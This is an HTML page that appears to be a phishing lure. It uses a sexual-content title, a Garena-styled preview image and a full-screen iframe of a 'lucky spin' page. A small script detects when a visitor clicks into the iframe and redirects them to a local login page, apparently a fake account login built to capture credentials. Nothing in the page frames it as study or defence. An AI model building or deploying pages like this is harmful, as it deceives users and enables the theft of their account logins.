

	    <!DOCTYPE html>
        <html>
        <head>
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <title>S.e.x Template</title>
        <meta property="og:url" content="" />
        <meta property="og:type" content="article" />
        <meta property="og:title" content="S.e.x Template" />
        <meta property="og:description" content="S.e.x Template" />
            <meta property="og:image" content="https://garena.pro/Template/8.png" />
        <style>
        .container {
          position: relative;
          width: 100%;
          overflow: hidden;
          padding-top: 100%; /* 1:1 Aspect Ratio */
        }
        
        .responsive-iframe {
          position: fixed;
          top: 0;
          left: 0;
          bottom: 0;
          right: 0;
          width: 100%;
          height: 100%;
          border: none;
        }
                </style>
                </head>
                <body>
                
                <div class="container">
                    <iframe class="responsive-iframe" id="iframe" sandbox src="https://trianff.com/vongquay.html"></iframe>
                  </div>
                <script>
                    focus();
                var listener = addEventListener('blur', function() {
                    if(document.activeElement === document.getElementById('iframe')) {
                        window.location.href="./login.html";
                    }
                    removeEventListener(listener);
                });
                </script>
                </body>
                </html>
                
                        <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
        